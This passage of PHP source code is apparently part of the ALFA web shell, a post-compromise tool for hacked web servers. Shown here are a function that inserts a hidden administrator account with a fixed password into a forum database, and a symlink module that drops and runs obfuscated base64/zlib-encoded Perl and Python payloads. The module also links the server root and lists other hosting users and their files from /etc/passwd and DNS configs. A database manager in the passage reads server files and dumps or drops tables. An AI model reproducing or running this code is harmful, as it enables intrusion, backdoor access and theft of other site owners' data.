4687 array('color' => 'FF0000', 'tdName' => 'Admin Pass', 'inputName' => 'hi', 'inputValue' => 'solevisible', 'inputSize' => '50', 'disabled' => true),
4688 );
4689create_table($table);
4690echo '<p><input value=" " name="send" type="submit"></p></form></center>';
4691if ($_POST['alfa1'] && $_POST['alfa1'] == '>>'){
4692$localhost = $_POST['alfa2'];
4693$database = $_POST['alfa3'];
4694$username = $_POST['alfa5'];
4695$password = $_POST['alfa6'];
4696$prefix = $_POST['alfa7'];
4697$admin = $_POST['alfa8'];
4698$conn=@mysqli_connect($localhost,$username,$password,$database) or die(mysqli_error($conn));
4699$setpwAlg = sha1(strtolower($admin) . 'solevisible');
4700$solevisible=@mysqli_query($conn,"insert into {$prefix}members (id_member,member_name,id_group,real_name,passwd,email_address) values(null,'$admin','1','$admin','$setpwAlg','solevisible@fbi.gov')") or die(mysqli_error($conn));
4701if($solevisible){
4702__alert('Success... '.$admin.' is created...');}
4703}
4704}
4705echo "</div>";
4706alfafooter();
4707}
4708function alfaMakePwd(){
4709 if(_alfa_file_exists("/etc/virtual/domainowners")||(_alfa_file_exists("/etc/named.conf")&&_alfa_file_exists("/etc/valiases"))){
4710 return "/home/{user}/public_html/";
4711 }
4712 $document = explode("/", $_SERVER["DOCUMENT_ROOT"]);
4713 $public = end($document);
4714 array_pop($document);
4715 array_pop($document);
4716 $path = implode("/", $document) . "/{user}/" . $public;
4717 return $path;
4718}
4719function alfaGetDomains($state = false){
4720 $state = "named.conf";
4721 $lines = array();
4722 $lines = _alfa_file('/etc/named.conf');
4723 if(!$lines){
4724 $lines = @scandir("/etc/valiases/");
4725 $state = "valiases";
4726 if(!$lines){
4727 $lines = @scandir("/var/named");
4728 $state = "named";
4729 if(!$lines && $state){
4730 $lines = _alfa_file('/etc/passwd');
4731 $state = "passwd";
4732 }
4733 }
4734 }
4735 return array("lines" => $lines, "state" => $state);
4736}
4737function alfasymlink(){
4738alfahead();
4739AlfaNum(9,10);
4740echo '<div class=header><br><center><div class="txtfont_header">| Symlink |</div><center><h3><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symphp\')">| Symlink( php ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'symperl\')">| Symlink( perl ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,\'sympy\')">| Symlink( python ) | </a><a href=javascript:void(0) onclick="g(\'symlink\',null,null,null,null,\'SymFile\')">| File Symlink | </a></h3></center>';
4741if(isset($_POST['alfa2'])&&($_POST['alfa2']=='symperl'||$_POST["alfa2"]=="sympy")){
4742 $sympath = alfaMakePwd();
4743 @mkdir('cgialfa',0755);
4744 @chdir('cgialfa');
4745 alfacgihtaccess('cgi');
4746 $perl = '#!/usr/bin/perl -I/usr/local/bandmin'."\n".'use MIME::Base64;use Compress::Zlib;eval(Compress::Zlib::memGunzip(decode_base64("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")));';
4747 $py = '#!/usr/bin/python'."\nimport zlib, base64\n".'eval(compile(zlib.decompress(base64.b64decode("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")),\'<string>\',\'exec\'))';
4748 $cginame = "symperl.alfa";
4749 $source = $perl;
4750 $lang = "perl";
4751 if($_POST["alfa2"]=="sympy"){
4752 $cginame = "pysymlink.alfa";
4753 $source = $py;
4754 $lang = "python";
4755 }
4756 @__write_file($cginame,$source);
4757 @chmod($cginame,0755);
4758 echo __pre();
4759 $resource = alfaEx("{$lang} {$cginame} {$sympath}",false,true,true);
4760 if(strlen($resource) == 0){
4761 echo AlfaiFrameCreator('cgialfa/'.$cginame);
4762 }else{
4763 echo $resource;
4764 }
4765}
4766if(isset($_POST['alfa4']) && $_POST['alfa4']=='SymFile'){
4767if(function_exists('symlink')||_alfa_can_runCommand(true,true)){
4768AlfaNum(9,10);
4769echo __pre().'
4770<center><p><div class="txtfont_header">| Symlink File And Directory |</div></p><form onSubmit="g(\'symlink\',null,null,null,null,\'SymFile\',this.file.value,this.symfile.value,this.symlink.value);return false;" method="post">
4771<input type="text" name="file" placeholder="Example : /home/user/public_html/config.php" size="60"/><br />
4772<input type="text" name="symfile" placeholder="Example : alfa.txt" size="60"/>
4773<p><input type="submit" value=" " name="symlink" /></p></form></center>';
4774$path = $_POST['alfa5'];
4775$symname = $_POST['alfa6'];
4776$solevisible58 = $_POST['alfa7'];
4777if($solevisible58){
4778$new_name = str_replace(".", "_", basename($symname));
4779$rand_dir = $new_name.rand(111,9999);
4780$sym_dir = 'alfasymlinkphp/'.$rand_dir.'/';
4781@mkdir($sym_dir, 0777, true);
4782alfacgihtaccess('sym', $sym_dir, $symname);
4783_alfa_symlink("$path","$sym_dir/$symname");
4784echo __pre();
4785echo '<center><b><font color="white">Click >> </font><a target="_blank" href="'.$sym_dir.'" ><b><font size="4">'.$symname.'</font></b></a></b></center>';
4786}
4787}else{echo "<center><pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";}
4788}
4789if(isset($_POST['alfa2']) && $_POST['alfa2']=='symphp'){
4790$cant_symlink = true;
4791if(function_exists('symlink')||_alfa_can_runCommand(false,false)){
4792@mkdir('alfasymlink',0777);
4793alfacgihtaccess('sym','alfasymlink/');
4794_alfa_symlink('/','alfasymlink/root');
4795$table_header = "<pre id=\"strOutput\" style=\"margin-top:5px\" class=\"ml1\"><br><table id='tbl_sympphp' align='center' width='40%' class='main' border='1'><td><span style='color:#FFFF01;'><b>*</span></b></td><td><span style='color:#00A220;'><b>Domains</span></b></td><td><span style='color:#FFFFFF;'><b>Users</span></b></td><td><span style='color:#FF0000;'><b>symlink</span></b></td>";
4796if(_alfa_file_exists("/etc/named.conf") && !_alfa_file_exists("/etc/virtual/domainowners") && _alfa_file_exists("/etc/valiases/")){
4797echo "<center>";
4798$lines = array();
4799$anony_domains = array();
4800$anonymous_users = array();
4801$f_black = array();
4802$error = false;
4803$anonymous = false;
4804$makepwd = "/home/{user}/public_html/";
4805$domains = alfaGetDomains();
4806$lines = $domains["lines"];
4807$state = $domains["state"];
4808$is_posix = function_exists("posix_getpwuid") && function_exists("fileowner");
4809$can_runcmd = _alfa_can_runCommand(false,false);
4810if(!$is_posix && !$can_runcmd){
4811 $anonymous = true;
4812 $anony_domains = $domains["lines"];
4813 $lines = _alfa_file('/etc/passwd');
4814}
4815echo $table_header;
4816$count=1;
4817$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="{http}"/><span style="color:#00A220;margin-left:10px;"><b>{domain}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{owner}</font></b></td><td><a href="alfasymlink/root{sympath}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4818foreach($lines as $line){
4819 $domain = "";
4820 $owner = "";
4821 if($anonymous){
4822 $explode = explode(":", $line);
4823 $owner = $explode[0];
4824 $owner_len = strlen($owner) - 1;
4825 $userid = $explode[2];
4826 if((int)$userid < 500)continue;
4827 $domain = "[?????]";
4828 $temp_black = array();
4829 $finded = false;
4830 foreach($anony_domains as $anony){
4831 if($state == "named.conf"){
4832 if(@strstr($anony, 'zone')){
4833 preg_match_all('#zone "(.*)"#',$anony, $data);
4834 $domain = $data[1][0];
4835 }else{
4836 continue;
4837 }
4838 }elseif($state == "named" || $state == "valiases"){
4839 if($anony == "." || $anony == "..")continue;
4840 if($state == "named")$anony = rtrim($anony, ".db");
4841 $domain = $anony;
4842 }
4843 $sub_domain = str_replace(array("-","."), "", $domain);
4844 if(substr($owner, 0, $owner_len) == substr($sub_domain, 0, $owner_len)){
4845 if(in_array($owner.$domain, $temp_black))continue;
4846 $sympath = str_replace("{user}", $owner, $makepwd);
4847 $http = "http://".$domain;
4848 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4849 $count++;
4850 $temp_black[] = $owner.$domain;
4851 $finded = true;
4852 }
4853 }
4854 if(!$finded){
4855 $anonymous_users[] = $owner;
4856 }
4857 }else{
4858 if($state == "named.conf"){
4859 if(@strstr($line, 'zone')){
4860 preg_match_all('#zone "(.*)"#',$line, $data);
4861 $domain = $data[1][0];
4862 }else{
4863 continue;
4864 }
4865 }elseif($state == "named" || $state == "valiases"){
4866 if($line == "." || $line == "..")continue;
4867 if($state == "named")$line = rtrim($line, ".db");
4868 $domain = $line;
4869 }
4870 if(strlen(trim($domain)) > 2 && $state != "passwd"){
4871 if(!_alfa_file_exists('/etc/valiases/'.$domain, false))continue;
4872 if($is_posix){
4873 $user = @posix_getpwuid(@fileowner('/etc/valiases/'.$domain));
4874 $owner = $user["name"];
4875 }elseif($can_runcmd){
4876 $owner = alfaEx("stat -c '%U' /etc/valiases/".$domain,false,false);
4877 }
4878 }
4879 }
4880 if(!$anonymous){
4881 if(strlen($owner)==0 || in_array($owner.$domain, $f_black))continue;
4882 $sympath = str_replace("{user}", $owner, $makepwd);
4883 $http = "http://".$domain;
4884 if($state == "passwd"){
4885 $http = "javascript:alert('we cant find domain...')";
4886 }
4887 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, $domain, $owner, $sympath), $template);
4888 $count++;
4889 $f_black[] = $owner.$domain;
4890 }
4891}
4892if($anonymous){
4893 foreach($anonymous_users as $owner){
4894 $sympath = str_replace("{user}", $owner, $makepwd);
4895 $http = "javascript:alert('we cant find domain...')";
4896 echo str_replace(array("{count}", "{http}", "{domain}", "{owner}", "{sympath}"), array($count, $http, "[????]", $owner, $sympath), $template);
4897 $count++;
4898 }
4899}
4900$cant_symlink = false;
4901}else{
4902$is_direct = false;
4903$makepwd = alfaMakePwd();
4904if(_alfa_file_exists("/etc/virtual/domainowners")){
4905 $makepwd = "/home/{user}/public_html";
4906 $is_direct = true;
4907}
4908$sole = _alfa_file("/etc/virtual/domainowners");
4909$count=1;
4910echo $table_header;
4911$template = '<tr><td><span style="color:#FFFF01;">{count}</span></td><td style="text-align:left;"><a target="_blank" href="http://www.{url}"/><span style="color:#00A220;margin-left:10px;"><b>{url}</b> </a></span></td><td style="text-align:left;"><span style="color:#FFFFFF;margin-left:10px;"><b>{user}</font></b></td><td><a href="alfasymlink/root{cwd}" target="_blank"><span style="color:#FF0000;">Symlink</span></a></td></tr>';
4912if($sole){
4913 foreach($sole as $visible){
4914 if(@strstr($visible,":")){
4915 $solevisible = explode(':', $visible);
4916 $cwd = str_replace("{user}", trim($solevisible[1]), $makepwd);
4917 echo str_replace(array("{count}","{user}","{url}","{cwd}"), array($count++, trim($solevisible[1]), trim($solevisible[0]), $cwd), $template);
4918 }
4919 }
4920}else{
4921 $passwd = _alfa_file("/etc/passwd");
4922 if($passwd){
4923 $html = "";
4924 $is_named = false;
4925 $users = array();
4926 $domains = array();
4927 $uknowns = array();
4928 foreach($passwd as $user){
4929 $user = trim($user);
4930 $expl = explode(":", $user);
4931 if((int)$expl[2] < 500)continue;
4932 $users[$expl[0]] = $expl[5];
4933 }
4934 $site_domains = @scandir("/etc/virtual/");
4935 if(!$site_domains){
4936 $site_domains = alfaEx("ls /etc/virtual/");
4937 $site_domains = explode("\n", $site_domains);
4938 if(!$site_domains){
4939 $site_domains = _alfa_file("/etc/named.conf");
4940 if($site_domains){$is_named = true;}
4941 }
4942 }
4943 foreach($site_domains as $line){
4944 if($is_named){
4945 if(@strstr($line, 'zone')){
4946 preg_match_all('#zone "(.*)"#',$line, $data);
4947 $domain = $data[1][0];
4948 if(strlen($domain > 2) && !empty($domain)){
4949 $domains[] = $domain;
4950 }
4951 }
4952 }else{
4953 $domains[] = $line;
4954 }
4955 }
4956 $x = 1;
4957 foreach($users as $user => $home){
4958 foreach($domains as $domain){
4959 $user_len = strlen($user) - 1;
4960 $sub_domain = str_replace(array("-","."), "", $domain);
4961 $five_user = substr($user, 0,$user_len);
4962 $five_domain = substr($sub_domain, 0,$user_len);
4963 if($five_user == $five_domain){
4964 if($is_direct){
4965 $cwd = str_replace("{user}", $user, $makepwd);
4966 }else{
4967 $expl = explode("}/", $makepwd);
4968 $cwd = $home."/".$expl[1];
4969 }
4970 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, $domain, $cwd), $template);
4971 }else{
4972 $uknowns[$user] = $home;
4973 }
4974 }
4975 }
4976 $uknowns = array_unique($uknowns);
4977 foreach($uknowns as $user => $home){
4978 if($is_direct){
4979 $cwd = str_replace("{user}", $user, $makepwd);
4980 }else{
4981 $expl = explode("}/", $makepwd);
4982 $cwd = $home."/".$expl[1];
4983 }
4984 $html .= str_replace(array("{count}","{user}","{url}", "{cwd}"), array($x++, $user, "[?????]", $cwd), $template);
4985 }
4986 echo($html);
4987 }
4988}
4989echo "</table>";
4990$cant_symlink = false;
4991}
4992}else{
4993 echo "<pre class=ml1 style='margin-top:5px'><b><font color=\"#FFFFFF\">[+] Symlink Function Disabled !</b></font></pre></center>";
4994 $cant_symlink = false;
4995}
4996if($cant_symlink)echo '<pre id="strOutput" style="margin-top:5px" class="ml1"><br><font color="#FFFFFF">Error...</font></b><br>';
4997echo "</center></table>";
4998}
4999echo "</div>";
5000alfafooter();
5001}
5002function alfasql(){
5003if(!isset($_POST['sql_host'])){
5004$_POST['sql_host'] = $_SESSION["sql_host"];
5005$_POST['sql_login'] = $_SESSION["sql_login"];
5006$_POST['sql_pass'] = $_SESSION["sql_pass"];
5007$_POST['sql_base'] = $_SESSION["sql_base"];
5008}
5009class DbClass{
5010public $type;
5011public $link;
5012public $res;
5013function __construct($type){
5014$this->type = $type;
5015}
5016function connect($host, $user, $pass, $dbname){
5017switch($this->type){
5018case 'mysql':
5019if($this->link = @mysqli_connect($host,$user,$pass,$dbname)) return true;
5020break;
5021case 'pgsql':
5022$host = explode(':', $host);
5023if(!$host[1]) $host[1]=5432;
5024if( $this->link = @pg_connect("host={$host[0]} port={$host[1]} user=$user password=$pass dbname=$dbname") ) return true;
5025break;
5026}
5027return false;
5028}
5029function selectdb($db){
5030switch($this->type){
5031case 'mysql':
5032if(@mysqli_select_db($db))return true;
5033break;
5034}
5035return false;
5036}
5037function query($str){
5038switch($this->type){
5039case 'mysql':
5040return $this->res = @mysqli_query($this->link,$str);
5041break;
5042case 'pgsql':
5043return $this->res = @pg_query($this->link,$str);
5044break;
5045}
5046return false;
5047}
5048function fetch(){
5049$res = func_num_args()?func_get_arg(0):$this->res;
5050switch($this->type){
5051case 'mysql':
5052return @mysqli_fetch_assoc($res);
5053break;
5054case 'pgsql':
5055return @pg_fetch_assoc($res);
5056break;
5057}
5058return false;
5059}
5060function listDbs(){
5061switch($this->type){
5062case 'mysql':
5063return $this->query("SHOW databases");
5064break;
5065case 'pgsql':
5066return $this->res = $this->query("SELECT datname FROM pg_database WHERE datistemplate!='t'");
5067break;
5068}
5069return false;
5070}
5071function listTables(){
5072switch($this->type){
5073case 'mysql':
5074return $this->res = $this->query('SHOW TABLES');
5075break;
5076case 'pgsql':
5077return $this->res = $this->query("select table_name from information_schema.tables where table_schema != 'information_schema' AND table_schema != 'pg_catalog'");
5078break;
5079}
5080return false;
5081}
5082function error(){
5083switch($this->type){
5084case 'mysql':
5085return @mysqli_error($this->link);
5086break;
5087case 'pgsql':
5088return @pg_last_error();
5089break;
5090}
5091return false;
5092}
5093function setCharset($str){
5094switch($this->type){
5095case 'mysql':
5096if(function_exists('mysql_set_charset'))
5097return @mysqli_set_charset($this->link,$str);
5098else
5099$this->query('SET CHARSET '.$str);
5100break;
5101case 'pgsql':
5102return @pg_set_client_encoding($this->link, $str);
5103break;
5104}
5105return false;
5106}
5107function loadFile($str){
5108switch($this->type){
5109case 'mysql':
5110return $this->fetch($this->query("SELECT LOAD_FILE('".addslashes($str)."') as file"));
5111break;
5112case 'pgsql':
5113$this->query("CREATE TABLE solevisible(file text);COPY solevisible FROM '".addslashes($str)."';select file from solevisible;");
5114$r=array();
5115while($i=$this->fetch())
5116$r[] = $i['file'];
5117$this->query('drop table solevisible');
5118return array('file'=>implode("\n",$r));
5119break;
5120}
5121return false;
5122}
5123function dump($table, $fp = false){
5124switch($this->type){
5125case 'mysql':
5126$res = $this->query('SHOW CREATE TABLE `'.$table.'`');
5127$create = mysqli_fetch_array($res);
5128$sql = $create[1].";\n";
5129if($fp) fwrite($fp, $sql); else echo($sql);
5130$this->query('SELECT * FROM `'.$table.'`');
5131$head = true;
5132while($item = $this->fetch()){
5133$columns = array();
5134foreach($item as $k=>$v) {
5135if($v == null)
5136$item[$k] = "''";
5137elseif(is_numeric($v))
5138$item[$k] = $v;
5139else
5140$item[$k] = "'".@mysqli_real_escape_string($this->link, $v)."'";
5141$columns[] = "`".$k."`";
5142}
5143if($head) {
5144$sql = 'INSERT INTO `'.$table.'` ('.implode(", ", $columns).") VALUES \n\t(".implode(", ", $item).')';
5145$head = false;
5146} else
5147$sql = "\n\t,(".implode(", ", $item).')';
5148if($fp) fwrite($fp, $sql); else echo($sql);
5149}
5150if(!$head)
5151if($fp) fwrite($fp, ";\n\n"); else echo(";\n\n");
5152break;
5153case 'pgsql':
5154$this->query('SELECT * FROM '.$table);
5155while($item = $this->fetch()) {
5156$columns = array();
5157foreach($item as $k=>$v) {
5158$item[$k] = "'".addslashes($v)."'";
5159$columns[] = $k;
5160}
5161$sql = 'INSERT INTO '.$table.' ('.implode(", ", $columns).') VALUES ('.implode(", ", $item).');'."\n";
5162if($fp) fwrite($fp, $sql); else echo($sql);
5163}
5164break;
5165}
5166return false;
5167}
5168};
5169$db = new DbClass($_POST['type']);
5170if(@$_POST['alfa1']=='dumpfile'||@$_POST['alfa1']=='droptbl'){
5171$db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base']);
5172$db->selectdb($_POST['sql_base']);
5173switch($_POST['charset']){
5174case "Windows-1251": $db->setCharset('calfa1251'); break;
5175case "UTF-8": $db->setCharset('utf8'); break;
5176case "KOI8-R": $db->setCharset('koi8r'); break;
5177case "KOI8-U": $db->setCharset('koi8u'); break;
5178case "calfa866": $db->setCharset('calfa866'); break;
5179}
5180$json = json_decode($_POST['alfa2'],true);
5181if(count($json['tbl'])>0){
5182if($_POST['alfa1']=='dumpfile'){
5183if($fp = @fopen($json['file'],'w')){
5184foreach($json['tbl'] as $v)$db->dump($v, $fp);
5185fclose($fp);
5186$dumpStatus = true;
5187}}else{
5188foreach($json['tbl'] as $v)$db->query('DROP TABLE '.$v);
5189}
5190}
5191unset($_POST['alfa2']);
5192}
5193alfahead();
5194echo "
5195<div class=header><center><div class='txtfont_header'>| Sql Manager |</div><p>".getConfigHtml('all')."</p></center>
5196<form name='sf' method='post' onsubmit='fs(this);return false;'><table cellpadding='2' cellspacing='0'><tr>
5197<td><div class=\"txtfont\">TYPE</div></td><td><div class=\"txtfont\">HOST</div></td><td><div class=\"txtfont\">DB USER</div></td><td><div class=\"txtfont\">DB PASS</div></td><td><div class=\"txtfont\">DB NAME</div></td><td></td></tr><tr>
5198<input type='hidden' name='a' value=Sql><input type='hidden' name='alfa1' value='query'><input type='hidden' name='alfa2' value=''><input type=hidden name=c value='". htmlspecialchars($GLOBALS['cwd']) ."'><input type=hidden name=charset value='". (isset($_POST['charset'])?$_POST['charset']:'UTF-8') ."'>
5199<td><select name='type'><option value='mysql' ";
5200if(@$_POST['type']=='mysql')echo 'selected';
5201echo ">MySql</option><option value='pgsql' ";
5202if(@$_POST['type']=='pgsql')echo 'selected';
5203echo ">PostgreSql</option></select></td>
5204<td><input type='text' name='sql_host' id='db_host' value='". (empty($_POST['sql_host'])?'localhost':htmlspecialchars($_POST['sql_host'])) ."'></td>
5205<td><input type='text' name='sql_login' id='db_user' value='". (empty($_POST['sql_login'])?'':htmlspecialchars($_POST['sql_login'])) ."'></td>
5206<td><input type='text' name='sql_pass' id='db_pw' value='". (empty($_POST['sql_pass'])?'':htmlspecialchars($_POST['sql_pass'])) ."'></td><td>";
5207$tmp = "<input type='text' name='sql_base' id='db_name' value='". (empty($_POST['sql_base'])?'':htmlspecialchars($_POST['sql_base'])) ."'>";
5208if(isset($_POST['sql_host'])){
5209if($db->connect($_POST['sql_host'], $_POST['sql_login'], $_POST['sql_pass'], $_POST['sql_base'])) {
